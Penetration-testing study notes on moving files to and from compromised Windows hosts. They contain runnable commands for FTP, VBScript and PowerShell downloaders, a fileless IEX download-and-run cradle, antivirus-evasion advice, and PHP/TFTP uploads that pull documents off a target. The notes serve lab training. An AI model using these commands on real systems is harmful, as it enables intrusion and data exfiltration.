File Transfers

For more practical notes, see File Transfer Techniques

Considerations and Preparations

Dangers of Transferring Attack Tools

Could be abused by other attackers
Anti Virus Software will detect and remediate the tools
- To get a round this try to use native tools as much as possible
  - Windows
  - Unix

Installing Pure-FTPd

install: sudo apt update && sudo apt install pure-ftpd

to configure and start, use this script:

#!/bin/bash
 
sudo groupadd ftpgroup
sudo useradd -g ftpgroup -d /dev/null -s /etc ftpuser
sudo pure-pw useradd offsec -u ftpuser -d /ftphome
sudo pure-pw mkdb
sudo cd /etc/pure-ftpd/auth/
sudo ln -s ../conf/PureDB 60pdb
sudo mkdir -p /ftphome
sudo chown -R ftpuser:ftpgroup /ftphome/
sudo systemctl restart pure-ftpd

The Non-Interactive Shell

e.g.: basic bind or reverse shell
if we then try to start a program which prompt us for an input (← an interaction) we won’t get the prompt message, because the STOUT is not redirected correctly
to fix this we can upgrade our basic shell by:
- Unix: python -c 'import pty; pty.spawn("/bin/bash")'

Transferring Files with Windows Hosts

Non-Interactive FTP Download

assumption: we have a bind shell on our windows target talking with our kali instance
Windows by default ships with a CLI called: ftp
We’ll abuse the -s:filename flag which Specifies a text file containing FTP commands; the commands will automatically run after FTP starts.
- copy the file we want to transfer into ftphome: sudo cp /usr/share/windows-resources/binaries/nc.exe /ftphome/
- restart pure-ftpd: sudo systemctl restart pure-ftpd
- create our command text file:
```
echo open 10.11.0.4 21> ftp.txt
echo USER offsec>> ftp.txt
echo lab>> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
```
- execute: ftp -v -n -s:ftp.txt

Windows Downloads Using Scripting Languages

VBScript

place the file you want to upload to the client in the web root: sudo cp /usr/share/windows-resources/binaries/wget.exe /var/www/html/

create a vbs file which acts like wget:

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo  Err.Clear >> wget.vbs
echo  Set http = Nothing >> wget.vbs
echo  Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo  If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo  If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo  If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo  http.Open "GET", strURL, False >> wget.vbs
echo  http.Send >> wget.vbs
echo  varByteArray = http.ResponseBody >> wget.vbs
echo  Set http = Nothing >> wget.vbs
echo  Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo  Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo  strData = "" >> wget.vbs
echo  strBuffer = "" >> wget.vbs
echo  For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo  ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo  Next >> wget.vbs
echo  ts.Close >> wget.vbs

use that wget to download the file we placed into our web root: cscript wget.vbs http://10.11.0.4/wget.exe evil.exe

PowerShell
- create a PowerShell script which acts like wget:
```
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.11.0.4/wget.exe" >>wget.ps1
echo $file = "evil.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
```
- use that wget script to download the file we placed into our web root: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
- or just use this one-liner: powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe', 'evil.exe')
- or if we need to be stealthy and not write the file to disk:
  - create a powershell script in our web root: echo 'Write-Output "Hello World"' > /var/www/html/helloworld.ps1
  - execute it: powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://10.11.0.4/helloworld.ps1')

Windows Downloads with exe2hex and PowerShell

The is option will take a bit longer, but it is also less common:
- compress our binary: upx -9 evil.exe
- covert it to hex and create a windows script: exe2hex -x evil.exe -p evil.cmd
- copy it to our clipboard: cat evil.cmd | xclip -selection clipboard
- paste the script into our windows shell
  - this will redirect the hex data into powershell
  - which will assemble it back into a binary
- All this is Non-Interactive!

Windows Uploads Using Windows Scripting Languages

place this php code into the web root /var/www/html/upload.php:

<?php
$uploaddir = '/var/www/uploads/';
 
$uploadfile = $uploaddir . $_FILES['file']['name'];
 
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>

create the folder: mkdir /var/www/uploads
set the permissions: sudo chown www-data: /var/www/uploads
Remove the php file after your done! Otherwise anybody can create a file on your kali VM
Upload the important file from the target: powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')

Uploading Files with TFTP

If the target is very old (up to Windows XP and 2003) use this method

install a tftp server on kali, set it up and run it:

sudo apt update && sudo apt install atftp
sudo mkdir /tftp
sudo chown nobody: /tftp
sudo atftpd --daemon --port 69 /tftp

on our old windows target, run tftp -i 10.11.0.4 put important.docx to upload the file

Relevant Note(s): Penetration Testing

Till Studer's Notes

Recent Notes

Eating Your Own Dog Food

The Map Is Not the Territory

The Zen of Security Rules

Public Attack Simulation Repos

Public Detection Rule Repos